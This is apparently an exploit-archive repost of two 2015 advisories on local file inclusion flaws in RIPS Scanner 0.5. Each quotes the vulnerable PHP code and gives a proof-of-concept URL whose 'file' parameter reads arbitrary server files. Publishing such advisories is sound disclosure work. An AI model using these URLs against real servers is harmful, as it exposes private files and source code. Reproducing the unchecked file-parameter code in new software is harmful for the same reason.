Home / os / winmobile

Rips Scanner 0.5 Local File Inclusion

Posted on 25 December 2015

================================================================================
# Rips Scanner 0.5 - Local File Inclusion
================================================================================
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-lfi.txt
================================================================================
# Vulnerable File : function.php

# Vulnerable Code:

58 $file = $_GET['file'];
59 $start = (int)$_GET['start'];
60 $end = (int)$_GET['end'];
61 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
62
63
64 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
65 {
66 $lines = file($file);
67
68 if( isset($lines[$start]) && isset($lines[$end]) )
69 {
70 for($i=$start; $i<=$end; $i++)
71 {
72 echo highlightline($lines[$i], $i);
73 }
74 } else
75 {
76 echo '<tr><td>Sorry, wrong file referenced.</td></tr>';
77 }
78 } else
79 {
80 echo '<tr><td>Sorry, no file referenced.</td></tr>';
81 }

# PoC :

http://localhost/rips/windows/function.php?file=/var/www/html/index.php&start=1&end=20

Parmetrs :
file = path/file
start = 0
end = number of page's lines

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================

------

================================================================================
# Rips Scanner 0.5 - (code.php) Local File Inclusion
================================================================================
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt
================================================================================
# Vulnerable File : code.php

# Vulnerable Code:

102 $file = $_GET['file'];
103 $marklines = explode(',', $_GET['lines']);
104 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
105
106
107 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
108 {
109 $lines = file($file);
110
111 // place line numbers in extra table for more elegant copy/paste
without line numbers
112 echo '<tr><td><table>';
113 for($i=1, $max=count($lines); $i<=$max;$i++)
114 echo "<tr><td class="linenrcolumn"><span
class="linenr">$i</span><A id='".($i+2).''></A></td></tr>';
115 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
116
117 $in_comment = false;
118 for($i=0; $i<$max; $i++)
119 {
120 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
121 }
122 } else
123 {
124 echo '<tr><td>Invalid file specified.</td></tr>';
125 }

# PoC :

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

Vulnerable Parameter : file

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================

 

TOP

Malware :

Exploits :